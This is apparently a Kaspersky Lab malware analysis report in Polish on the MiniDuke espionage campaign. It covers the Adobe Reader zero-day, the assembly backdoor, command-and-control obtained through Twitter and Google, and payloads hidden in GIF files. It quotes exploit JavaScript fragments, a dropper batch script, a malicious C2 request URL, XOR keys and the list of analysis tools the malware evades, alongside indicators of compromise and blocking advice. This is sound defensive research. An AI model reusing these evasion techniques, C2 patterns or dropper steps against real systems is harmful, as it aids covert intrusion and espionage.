Stan zagrożeń w internecie znajduje się obecnie na poziomie standardowym. Nie występują duże epidemie a eksperci z Kaspersky Lab nie zanotowali żadnych poważnych incydentów związanych z bezpieczeństwem. Poziom zagrożenia: 1

Tajemnica MiniDuke’a: mikro backdoora pdf 0-day, stworzonego w asemblerze i szpiegującego instytucje rządowe


Dnia 12 lutego 2013 r., firma FireEye ogłosiła odkrycie (http://blog.fireeye.com/research/2013/02/the-number-of-the-beast.html) exploita 0-day dla aplikacji Adobe Reader, który jest stosowany do wdrażania wcześniej nieznanego, zaawansowanego szkodliwego oprogramowania. Nazwaliśmy tego nowego szkodnika „ItaDuke”, ponieważ przypominał on nam Duqu, oraz z powodu dawnych włoskich sentencji, zaczerpniętych z „Boskiej komedii” Dante Aligheriego i zamieszczonych w kodzie powłoki.

Od czasu pierwotnego zgłoszenia szkodliwego oprogramowania zaobserwowaliśmy kilka nowych incydentów z użyciem tego samego exploita (CVE-2013-0640), z których kilka było tak niezwykłych, że zdecydowaliśmy się przeanalizować je szczegółowo.

Wraz z naszym partnerem – laboratorium CrySyS Lab – przeprowadziliśmy szczegółową analizę tych zdarzeń, które mogą wskazywać na nowego, nieznanego wcześniej aktora w „teatrze zagrożeń”. Raport z analizy przeprowadzonej przez laboratorium CrySyS Lab znajduje się pod adresemhttp://blog.crysys.hu/2013/02/miniduke/. Raport z naszej analizy znajduje się poniżej.

Przede wszystkim, podczas gdy fałszywe raporty PDF „Mandiant” (zobacz tutaj) są po prostu zmodyfikowanymi mutacjami oryginalnego exploita, te nowsze ataki wydają się być prowadzone za pomocą zestawu narzędzi 0-day, który został użyty do stworzenia oryginalnego dokumentu „Visaform Tukey.pdf”, odkrytego przez firmę FireEye. Nowe ataki PDF używają fałszywych dokumentów, które są wyświetlane ofierze, kiedy exploit zostanie pomyślnie uruchomiony. Dokumenty dotyczą seminarium odnośnie praw człowieka (ASEM), ukraińskiej polityki zagranicznej i planów rozszerzenia członkostwa w NATO:

klp_miniduke_analiza_01.png
Dokument używany przeciwko celom na Węgrzech.

klp_miniduke_analiza_02.png
Dokument używany przeciwko celom w Belgii.

klp_miniduke_analiza_03.png
Dokument używany przeciwko celom w Luksemburgu.

Sumy MD5 dokumentów używanych w ataku to:

klp_miniduke_analiza_04.png

Kod JavaScript exploita został zmodyfikowany od czasu pierwotnego ataku. Dla przykładu, funkcja wcześniej nazywana „oTHERWISE” zmieniła nazwę na „q1w2e3r4t”. Funkcja występuje później w kodzie jako:

Nowy exploit: 
var sCIENZA = q1w2e3r4t(vOLENCI[sHOGG('ODNEDNERp',3329,7937)], gIRARSI);

Starszy exploit („Visaform Turkey.pdf”): 
var sCIENZA = oTHERWISE (vOLENCI['pRENDENDO'], gIRARSI);

Ponadto, kod JavaScript występuje teraz w formacie skompresowanym, natomiast w oryginalnej próbce miał on postać czystego tekstu. Powodem tych zmian było prawdopodobnie dążenie przez twórców do unikania wykrycia ich „dzieła” przez produkty antywirusowe, chociaż nie przeszkodziło to naszym produktom heurystycznie wykryć opisywane zagrożenie jako: „HEUR:Exploit.Script.Generic”.

Kod powłoki zawarty w dokumencie PDF jest podobny do tego, używanego w dokumentach przenoszących ładunek „ItaDuke”, lecz z drobnymi różnicami. Dla przykładu, po wykorzystaniu luki, shellcode poszukuje konkretnego podpisu w pliku PDF. Podczas, gdy shellcode „ItaDuke” szukał ciągu „!H2bYm.Sw@”, wersja „MiniDuke” poszukuje sygnatury „@34fZ7E[p\”.

klp_miniduke_analiza_05.png
Sygnatura w pliku PDF ItaDuke’a.

klp_miniduke_analiza_06.png
Sygnatura w pliku PDF MiniDuke’a.

Kiedy sygnatura ładunku zostanie odnaleziona, jest odszyfrowywana za pomocą algorytmu XOR, a następnie dekompresowana z wykorzystaniem API „RtlDecompressBuffer” (LZNT1). Wynikowy plik PE jest zapisywany do pliku tymczasowego i ładowany z użyciem API „LoadLibary”.

Utworzona biblioteka dynamiczna realizuje drugi etap instalacji. Zawiera ona dwa binarne zasoby,101 i 102. Zasób 101 jest głównym komponentem DLL backdoora. Zapisywany jest w katalogu %AppData% i ładowany z wykorzystaniem API „LoadLibary”. Zasób 102 jest dokumentem PDF - pułapką. Jest zapisywany w katalogu pamięci podręcznej Internet Explorera, a następnie otwierany za pomocą prostego pliku BAT:

TASKKILL /F /IM acro* 
ping -n 1 127.0.0.1>nul 
start "" "%ścieżka dostępu do pliku PDF - pułapki%" 

Nazwy plików, które są wdrażane, są na sztywno zdefiniowane w zasobach.

klp_miniduke_analiza_07.png
Początek zasobu 101 z jego nazwą.

klp_miniduke_analiza_08.png
Początek zasobu 102 z jego nazwą.

Co ciekawe, dropper złośliwego oprogramowania zawiera następujące ścieżki dostępu:

  • „c:\src\dlldropper\Release\L2P.pdb”;
  • „c:\src\hellodll\Release\hellodll.pdb”.

Ścieżki te nie istnieją w dropperze oryginalnego pliku PDF („Visaform Turkey.pdf”).

Jeśli zaufać nagłówkom PE, dropper został skompilowany dnia 20 lutego 2013 r:

klp_miniduke_analiza_09.png
Czas kompilacji „węgierskiego” droppera – „Wed Feb 20 10:51:16 2013”, czyli środa,20 lutego 2013 r., godz. 10:51:16.

Backdoor użyty w przypadku „węgierskim” został skompilowany 20 lutego 2013 r. o godzinie 10:57:52, czyli kilka minut po tym, jak dropper został stworzony.

Być może najbardziej niezwykłą rzeczą w tych trzech nowych atakach jest złośliwe oprogramowanie, jakie wdrażają. We wszystkich analizowanych przypadkach, złośliwe oprogramowanie ma formę pliku DLL o rozmiarze 22528 bajtów. Części szkodliwego pliku DLL są zaszyfrowane wraz z informacjami dotyczącymi konfiguracji systemu ofiary, co zapewnia, że szkodnik będzie poprawnie działał tylko na atakowanym systemie. Jeżeli zostanie skopiowany na inny komputer, nie będzie w stanie funkcjonować poprawnie.

Backdoor został napisany w „oldskulowym” języku asemblera i jak na dzisiejsze standardy jest wyjątkowo niewielki – jego rozmiar to tylko 20 KB. Jest to najbardziej niezwykłe zjawisko dla nowoczesnych, szkodliwych programów, które mogą mieć rozmiar rzędu kilku megabajtów. Na początku kodu znajduje się niewielki moduł deszyfrujący, który odszyfrowuje ciało szkodnika. Wszystkie trzy przypadki używają różnych kluczy szyfrowania. Inną osobliwością jest to, że backdoor nie ma funkcji importu: wszystkie funkcje są skanowane z pamięci i są wywoływane dynamicznie. Interesujące jest to, że dwa pierwsze API Win32, rozwiązywane i wywoływane przez procedurę rozpakowującą, to „ntdll.LdrLoadDll” i „kernel32.VirtualProtectEx”. Te dwie funkcje nie są wywoływane zgodnie z konwencją „_stdcall”. Zamiast tego, zaraz po ręcznym zbudowaniu stosu wykonywana jest instrukcja „jmp ebx”. Jasne jest, że ktoś przy tworzeniu tego złośliwego oprogramowania miał na myśli potrzebę stworzenia technik zakłócających emulację i skanowanie.

Analiza backdoora

Backdoor posiada pojedynczy eksport, który w przypadku „węgierskim” nazywa się „JorNgoq”. Kiedy ten eksport jest wywoływany przy ładowaniu, backdoor ustawia uprawnienia sekcji „.rdata” jako „RWX” i ustawia mutex jako zakodowany ciąg „nljhfdb”.

Punkt wejściowy biblioteki (DllMain) jest utajniony, a główny korpus szkodnika jest zaszyfrowany. Szyfrowanie jest dość proste: sekcja „.rdata” biblioteki jest szyfrowana algorytmem ROL z kluczem liniowym i algorytmem XOR z ustalonym kluczem. Oba klucze są wyliczane z długości części zaszyfrowanej.

klp_miniduke_analiza_10.png
Pętla deszyfrująca w utajnionym kodzie. 0x4522 to aktualny rozmiar części zaszyfrowanej.

Po zakończeniu odszyfrowywania, biblioteka przechodzi do prawdziwej funkcji „main”. Główna część biblioteki została napisana w asemblerze, w staroszkolny sposób, typowy dla wirusów niskiego poziomu. Kod jest niezależny od pozycji; nie posiada żadnych importów i rozwiązuje adresy funkcji API po wartościach hashów ich nazw.

klp_miniduke_analiza_11.png
Typowy styl szkodliwego programowania niskiego poziomu: przekazywanie ciągów jako parametry poprzez wywołania, adresowanie funkcji API ze względu na wartości hashów.

Backdoor utrzymuje siedem adresów wywołania, z których każdy utrzymuje swój własny blok funkcjonalny.

Pierwszy blok dwukrotnie wywołuje funkcję „GetAsyncKeyState”, oczekując na kliknięcie przycisku myszy, co wskazuje na aktywność użytkownika w systemie. Drugi blok wyszukuje wszystkie pliki „*.exe” i „*.dll” zlokalizowane w katalogu %temp%. Trzeci blok pobiera informacje o zainfekowanym systemie dzięki zapytaniom mającym na celu zebranie informacji na temat procesora, dysku i nazwy komputera – informacje te są używane do odszyfrowania głównego korpusu backdoora, który jest niestandardowo zaszyfrowany dla każdej unikatowej ofiary. Czwarty blok próbuje utrzymać autoochronę przed analizatorami złośliwego oprogramowania. Poniżej znajduje się lista narzędzi (oraz VMware), które szkodnik próbuje identyfikować i przed którymi chce się zabezpieczyć. Backdoor pobiera listę procesów uruchomionych w systemie i próbuje ustalić, czy następujące narzędzia są wśród nich:

apispy32.exe, apimonitor.exe, winapioverride32.exe, procmon.exe, filemon.exe, regmon.exe, winspy.exe, wireshark.exe, dumpcap.exe, tcpdump.exe, tcpview.exe, windump.exe, netsniffer.exe, iris.exe, comview.exe, ollydbg.exe, windbg.exe, odb.exe, ImmunityDebugger.exe, syser.exe, idag.exe, idag64.exe, petools.exe, vboxtray.exe, vboxservice.exe, procexp.exe, vmtools.exe, vmwaretray.exe, vmwareuser.exe.

Jeśli którekolwiek z powyższych narzędzi zostanie wykryte, złośliwe oprogramowanie pozostanie uruchomione w systemie bez dalszego odszyfrowania jego kodu i wykazywania innych funkcji. To powstrzymuje backdoora przed nawiązywaniem jakichkolwiek połączeń wychodzących, w celu komunikacji z kontami na Twitterze w sposób opisany poniżej. Innymi słowy, szkodnik próbuje identyfikować się jako kompletnie niefunkcjonalna część kodu, zwłaszcza dla narzędzi automatycznej analizy, ukrywając swoją prawdziwą naturę za własnymi warstwami szyfrowania.

Ciągi agenta użytkownika dla przeglądarek internetowych, takich jak Opera, Mozilla Firefox i Internet Explorer są odszyfrowane i używane do dostępu do internetu. Co ciekawe, zawarte są również wersje dla Linuksa:

(Windows NT 5.1; (Windows NT 6.0; (Windows; U; Windows NT 5.2; (X11; Linux i686; (X11; Linux x86_64; (zgodne; MSIE 6.0; Windows NT 5.0; (zgodne; MSIE 7.0; Windows NT 6.0; (zgodne; MSIE 9.0; Windows NT 6.1;WOW64) ;Trident/4.0) ; Trident/5.0) ; WOW64; Trident/5.0) ; SV1) )

Najciekawszy jest piąty i szósty blok kodu. Oblicza on sumę SHA1 z głównej informacji o systemie, która będzie używana później w interakcji z centrum kontroli.

klp_miniduke_analiza_12.png

Po wygenerowaniu hasha SHA1, backdoor za pomocą base64 szyfruje swój unikalny hash do dalszej komunikacji z centrum kontroli.

Złośliwe oprogramowanie jest aktywowane po restarcie zainfekowanego komputera. Aby przejąć kontrolę podczas startu systemu operacyjnego, szkodnik zapisuje plik LNK o losowej nazwie w folderze uruchamiania, plik ten z kolei wywołuje korpus szkodnika za pomocą funkcji rundll32:

klp_miniduke_analiza_13.png

klp_miniduke_analiza_14.png

Na zdjęciu powyżej główny korpus szkodliwego oprogramowania jest przechowywany jako plik „stat.bin” (nazwa jest wybierana losowo) w folderze „Adobe”. Plik LNK nazywa go tylko wyeksportowaną funkcją, „ImqRgno”.

Po aktywacji, szkodnik najpierw łączy się z Twitterem i szuka wiadomości ze specyficznych kont. Te konta opublikowały wiadomości z zaszyfrowanym ciągiem znaków, który zawiera magiczny identyfikator „uri!” i następujący po nim zaszyfrowany ciąg centrum kontroli.

klp_miniduke_analiza_15.png

klp_miniduke_analiza_16.png

klp_miniduke_analiza_17.png

Zakładamy, że na Twitterze istnieje wiele innych kont o podobnych parametrach.

Zaszyfrowany ciąg „uri!” podstawia inny serwer kontroli dla każdej wersji szkodliwego oprogramowania:

klp_miniduke_analiza_18.png

Następnie, szkodnik łączy się z witryną „www.geoiptool.com” w celu uzyskania informacji o lokalizacji ofiary.

Co ciekawe, backdoor posiada zapasową funkcjonalność uaktualniania centrum kontroli. Używa usługi Google Search poszukując specyficznego ciągu znaków:

klp_miniduke_analiza_19.png 
Ciąg „lUFEfiHKljfLKWPR”, którego szkodnik szuka za pomocą wyszukiwarki Google.

Strony wyszukane przez Google Search mogą zawierać aktualizację „uri”, podobną do tych, otrzymywanych za pośrednictwem Twittera. Możemy założyć, że napastnicy chcieli mieć drugi kanał aktualizacji w przypadku, gdyby konta na Twitterze zostały zamknięte.

Etap 2

„Index.php” na serwerze centrum kontroli serwuje ofierze fałszywy plik GIF, w zależności od parametrów, jakie otrzymuje. Oto, jak wygląda jeden z tych GIF-ów:

klp_miniduke_analiza_20.png

Poniżej znajduje się przykład szkodliwego żądania dla domeny centrum kontroli „arabooks[dot]ch”:

arabooks.ch/lib/index.php?ia=TJ2b7uzMuh4fnt2n7aJisckAj6pEvkLPPsmk5gC77rPeYKmj8z58UWS1szY0FGzkp[USUNIĘTO]lhUDxvzo1_IpYHfDI2MTg2NTM5OTF8MS4xMw==

Obrazek z pliku GIF file rzeczywiście jest bardzo mały i przypomina nam metodę ukrywania danych stosowaną przez Duqu w roku 2011, znaną jako steganografia:

klp_miniduke_analiza_21.png

Na offsecie 0x6a4 wewnątrz pliku GIF rezyduje ukryty plik PE. Schemat szyfrowania wykorzystuje odwrócony klucz DWORD, również przechowywany w pliku GIF. Skutecznie przekłada się to na 8 bajtowy klucz XOR. Wynikowy klucz szyfrujący wykorzystywany w ataku „węgierskim” to: { 0xD2, 0x2A, 0xA2, 0x27, 0x79, 0x95, 0x52, 0x2D}. W ataku „belgijskim” jest to: { 0xC5, 0x5E, 0xEE, 0xE5, 0x51, 0x11, 0x17, 0x7C}. Dla ataku „luksemburskiego” klucz ma postać: { 0x91, 0x18, 0x8C, 0xC1, 0x1C, 0xC9, 0x9C, 0xC9}.

klp_miniduke_analiza_22.png 
Odszyfrowany ładunek z fałszywego pliku GIF serwowanego przez centrum kontroli.

Odszyfrowany plik PE (wtyczka / ładunek) jest napisany również w asemblerze i jest szyfrowany przy pomocy tego samego algorytmu, co backdoor pierwotnie wdrożony w systemie. Do działań pliku PE odnosimy się jako do „etapu 2”. Korpus głównego backdoora zapisuje wtyczki pod różnymi nazwami, dla przykładu może to być „xml.dat”, i próbuje uruchomić ich jedyne eksporty za pomocą funkcji rundll. W naszym przypadku nie działało to zbyt dobrze:

klp_miniduke_analiza_24.png

Na serwerze centrum kontroli było w drugim etapie kilka różnych wariantów backdoorów; wszystkie one spełniają podobne funkcje, ale są szyfrowane za pomocą różnych kluczy i kontaktują się z różnymi serwerami centrum kontroli.

Informacje o serwerze centrum kontroli

Złośliwe oprogramowanie łączy się z różnymi serwerami centrum kontroli, w zależności od informacji dostępnych na Twitterze lub znalezionych przez Google Search. Dla przykładu, w domenie „artas[dot]org” szkodnik łączy się z lokalizacją „/engine/index.php”. Ciekawe jest to, że podfolder „img” pozwalał na przeglądanie jego zawartości, co umożliwiło nam podejrzenie kilku zaszyfrowanych wariantów backdoora, zakamuflowanych jako pliki GIF:

klp_miniduke_analiza_25.png

Folder w domenie „tsoftonline[dot]com” posiada identyczną strukturę:

klp_miniduke_analiza_26.png

Interesujące jest to, że w domenie „tsoftonline[dot]com” mamy kilka innych plików z różnego rodzaju nazwami i rozmiarami. Są one większe i wykorzystują inny schemat nazewnictwa: „[liczba].gif”. Sądzimy, że są to niestandardowe backdoory, dostarczane przez atakujących wyłącznie do określonych ofiar. Do tego fragmentu ataku odnosimy sią jako do „etapu 3”.

Etap 3

W momencie, gdy byliśmy w trakcie analizy próbek, napastnicy podłączyli się do centrum kontroli i dodali niestandardowego backdoora „1109821546.gif”:

"http://tsoftonline.com/views/img/1109821546.gif" 
HTTP/1.1 200 OK 
Date: Mon, 25 Feb 2013 12:34:13 GMT 
Server: Apache 
Last-Modified: Mon, 25 Feb 2013 10:59:49 GMT 
ETag: "7c8251-5190d-4d68a708d9340" 
Accept-Ranges: bytes 
Content-Length: 334093 
Content-Type: image/gif

Ten spersonalizowany backdoor, który gra główną rolę w „etapie 3”, jest znacznie większy niż jego poprzednicy – jego rozmiar to ponad 300 KB. To dlatego, że napastnicy użyli dużych pokładów zaciemniania kodu, łącznie z kompresją UCL. Dotychczas zaobserwowaliśmy dwa warianty 300-kilobajtowego backdoora „etapu 3”. Znacznik czasowy kompilacji PE dla obu wariantów to: „Mon Jun 18 17:28:11 2012” (poniedziałek, 18 czerwca 2012 r., godz. 17:28:11). Numer „1109821546” w nazwie pliku odnosi się do unikatowego identyfikatora ofiary. W tym przypadku udało nam się ustalić, że ofiara zlokalizowana jest w Portugalii.

Backdoor łączy się z następującym centrum kontroli w poszukiwaniu instrukcji:

news[dot]grouptumbler[dot]com/news/feed.php 
IP: 200.63.46.23 

Obsługiwanych jest kilka poleceń, takich jak: kopiowanie pliku, przenoszenie pliku, usuwanie pliku, tworzenie katalogu, przerywanie procesów i, oczywiście, pobieranie i uruchamianie nowego szkodliwego oprogramowania. Serwer o adresie 200.63.46.23 jest hostowany w Panamie:

klp_miniduke_analiza_27.png

Zakładamy, że serwer został zaatakowany przez napastników i obecnie jest używany jako serwer kontroli do przeprowadzania ataków.

Poniżej prezentujemy hashe MD5 znanych backdoorów „etapu 3”:

1e1b0d16a16cf5c7f3a7c053ce78f515       v1.ex_ 
53db085a276ebbf5798ba756cac833ea    v2.ex_ 

W dodatku do 300-kilobajtowych backdoorów „etapu 3”, zaobserwowaliśmy moduł o rozmiarze 13 KB (MD5: 6bc34809e44c40b61dd29e0a387ee682). Moduł ten łączy się z adresem IP w Turcji, otrzymuje odpowiedź, odszyfrowuje ją w pamięci i wykonuje. Adres serwera centrum kontroli to: 85.95.236.114.

klp_miniduke_analiza_28.png

Moduł posiada znacznik czasu kompilacji wskazujący na „Tue Nov 13 14:30:12 2012” (wtorek, 13 listopada 2012 r., godz. 14:30:12).

Rozkład geograficzny ofiar

Serwery centrum kontroli prowadzą szczegółowe, zakodowane dzienniki ofiar łączących się z serwerami. Dzienniki są dostępne dla każdego, kto zna dokładną nazwę pliku. Zbierając dzienniki ze wszystkich znanych serwerów kontroli, odkryliśmy połączenia z kilku dużych sieci należących do:

klp_miniduke_analiza_29.png

Odsetek ofiar o dużym stopniu ważności jest w tym ataku dość spory, co stawia go wśród zaawansowanych kampanii, takich jak „Red October”.

Ograniczenia i rekomendacje

Aby chronić się przed opisanymi atakami, zalecamy:

  • Uaktualnić Javę do najnowszej wersji lub całkowicie usunąć ją z systemu, jeżeli nie jest używana.
  • Uaktualnić Microsoft Windows i Office do najnowszych wersji.
  • Uaktualnić Adobe Reader do najnowszej wersji (zobacz https://www.adobe.com/support/security/bulletins/apsb13-07.html).
  • Zablokować wymianę ruchu sieciowego z następującymi domenami:
    • arabooks.ch
    • artas.org
    • tsoftonline.com
    • eamtm.com
    • news.grouptumbler.com

  • Zablokować wymianę ruchu sieciowego z następującymi adresami IP:
    • 200.63.46.23
    • 194.38.160.153
    • 95.128.72.24
    • 72.34.47.186
    • 188.40.99.143
    • 85.95.236.114

  • Zainstalować rozwiązanie bezpieczeństwa, zdolne do wykrywania opisanych zagrożeń, takie jak Kaspersky Internet Security 2013 i skanować wiadomości e-mail i wszystkie otrzymywane dokumenty.
  • Uważać na otwieranie w systemie podejrzanych dokumentów; do przeglądania „niepewnych” dokumentów użyć innego komputera bez połączenia z internetem, maszyny wirtualnej lub przesłać dokument do przeglądania w Dokumentach Google.
  • Pamiętać o tym, że zainfekowane dokumenty PDF zawierają ciąg znaków „@34fZ7E[p\”. Ciąg ten może być stosowany w celu szybkiej identyfikacji złośliwych dokumentów.

Wnioski

Bazując na naszym doświadczeniu, stwierdzamy, że jest to wyjątkowy i bardzo dziwny atak. Trafienie wielu różnych celów w poszczególnych krajach, wraz z ważnym profilem dokumentów - pułapek oraz nietypowa funkcjonalność backdoora wskazują pojawienie się niezwykłego aktora w „teatrze zagrożeń”. Kilka elementów (np. minimalistyczne podejście, zhakowane serwery, szyfrowane kanały komunikacyjne, a także typologia ofiar) przypomina nam Duqu i Red October.

Styl kodowania backdoora przywodzi nam na myśl grupę, która w przeszłości pisała złośliwe oprogramowanie, obecnie uważaną za „wymarłą”: 29A. Wartość „29A” w systemie szesnastkowym oznacza „666” i być może świadomie została ona pozostawiona w kodzie przez napastników jako wskazówka:

klp_miniduke_analiza_30.png 
Wskazówka 29A / 666 pozostawiona w kodzie przez napastników.

Grupa 29A opublikowała pierwszy magazyn traktujący o złośliwym oprogramowaniu w grudniu 1996 r. i była aktywna do lutego 2008 r., kiedy to ‘Virusbuster’, ostatni aktywny członek grupy ogłosił jej rozwiązanie.

Dzienniki serwerów centrum kontroli wskazują na determinację i sporo sukcesów w kompromitacji kilku poważnych podmiotów w różnych krajach. Znaczniki czasowe kompilacji „etapu 3” pokazują, że atakujący działają już od dłuższego czasu ale nadal udaje im się pozostać w ukryciu.

Być może jednym z najważniejszych pytań jest: czy te ataki są powiązane z atakiem „Itaduke”, który zaowocował doniesieniem o odkryciu PDF 0-day? Czy atak jest dziełem odrębnego podmiotu, który zakupił zestaw narzędzi z tego samego źródła, mającego inną agendę? Lub, być może, jest to zupełnie nowy gracz, w którego ręce wpadł exploit 0-day zmodyfikowany do własnych celów? Niestety, wciąż wiele pytań pozostaje bez odpowiedzi.

Analiza logów z serwerów kontroli wykazała 59 unikatowych ofiar z 23 krajów: Belgia, Brazylia, Bułgaria, Czechy, Gruzja, Niemcy, Węgry, Irlandia, Izrael, Japonia, Łotwa, Liban, Litwa, Czarnogóra, Portugalia, Rumunia, Federacja Rosyjska, Słowenia, Hiszpania, Turcja, Ukraina, Wielka Brytania oraz Stany Zjednoczone.

Produkty Kaspersky Lab wykrywają złośliwe oprogramowanie opisane w tym artykule jako „HEUR:Backdoor.Win32.MiniDuke.gen” i „Backdoor.Win32.Miniduke”, natomiast dokumenty z exploitami wykrywane są jako „Exploit.JS.Pdfka.giy”.

Referencje

„In Turn it’s PDF Time” (http://blog.fireeye.com/research/2013/02/in-turn-its-pdf-time.html)